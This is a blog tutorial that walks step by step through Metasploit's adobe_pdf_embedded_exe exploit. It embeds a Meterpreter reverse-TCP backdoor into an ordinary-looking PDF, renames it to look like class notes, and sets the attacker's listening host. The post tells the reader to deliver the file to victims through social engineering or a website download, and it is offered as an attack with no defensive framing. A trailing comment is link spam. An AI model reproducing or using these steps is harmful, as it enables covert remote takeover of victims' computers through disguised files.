How to Embed a Backdoor Connection in an Innocent- Looking PDF


How to Embed a Backdoor Connection in an Innocent- Looking PDF


Step 1: Find the Appropriate Exploit



First, let's find the appropriate exploit by searching Metasploit for one that will use this version of Adobe 

Reader:

msf > search type:exploit platform:windows adobe pdf




In the screenshot above we can see that Metasploit listed all the exploits that met our criteria. Let's use the 

"exploit/windows/fileformat/adobe_pdf_embedded_exe".

msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe


Step 2: Gather Info on This Exploit


Now let's take a look at the information available to us about this exploit:

msf > exploit (adobe_pdf_embedded_exe) > info






Note that in the description, Metasploit tells us that it embeds a Metasploit payload into an existing PDF 

file. The resulting PDF can be sent to a target as part of a social engineering attack. In addition to sending 

to the victim, one can also embed it into a website inviting the unsuspecting victim to download it.

Step 3: Set Our Payload


In our next step, we need to set our payload to embed into the PDF. Type:

msf > exploit (adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp



Step 4: Set Options


Now that we chosen our exploit and set our payload, the only thing left to do is to set our options. Let's take 

a look at the options for this exploit and payload by typing:

msf > exploit (adobe_pdf_embedded_exe) > show options








As you can see from the screenshot above, Metasploit requires us to provide an existing PDF where it can 

embed the Meterpreter.

Let's set a file named chapter1.pdf, presumably some class notes (make certain that this file was created 

with Reader 9 or earlier), to our INFILENAME option.

msf > exploit (adobe_pdf_embedded_exe) > set INFILENAME chapter1.pdf

Then change the default FILENAME of the output file with the embedded Meterpreter to same innocuous 

sounding chapter1.pdf. The default name is evil.pdf, but is likely to set off too many alarms.

msf > exploit (adobe_pdf_embedded_exe) > set FILENAME chapter1.pdf

Then, set the LHOST (our system) to our IP address or 192.168.100.1.

msf > exploit (adobe_pdf_embedded_exe) > set LHOST 192.168.100.1



Step 5: Double Check the Settings


Now, let's check our options again to see whether everything is ready to go.

msf > exploit (adobe_pdf_embedded_exe) > show options






Step 6: Exploit!


As you can see from the screenshot above, all our options are set all we need to do now exploit.

msf > exploit (adobe_pdf_embedded_exe) > exploit

Metasploit has created a PDF named chapter1.pdf that contains the Meterpeter listener. Metasploit has 

placed this file at /root/.msf4/local/chapter1.pdf.

Reference
http://www.blackhat-sec.com/2014/10/how-to-backdoor-pdfs.html.
Read more

Post a Comment

1 comment:

  1. AnonymousMarch 13, 2022 at 3:17 AM

    How To Embed A Backdoor Connection In An Innocent- Looking Pdf - Kaliacademy >>>>> Download Now

    >>>>> Download Full

    How To Embed A Backdoor Connection In An Innocent- Looking Pdf - Kaliacademy >>>>> Download LINK

    >>>>> Download Now

    How To Embed A Backdoor Connection In An Innocent- Looking Pdf - Kaliacademy >>>>> Download Full

    >>>>> Download LINK

    ReplyDelete

Subscribe to: Post Comments (Atom)

Information About You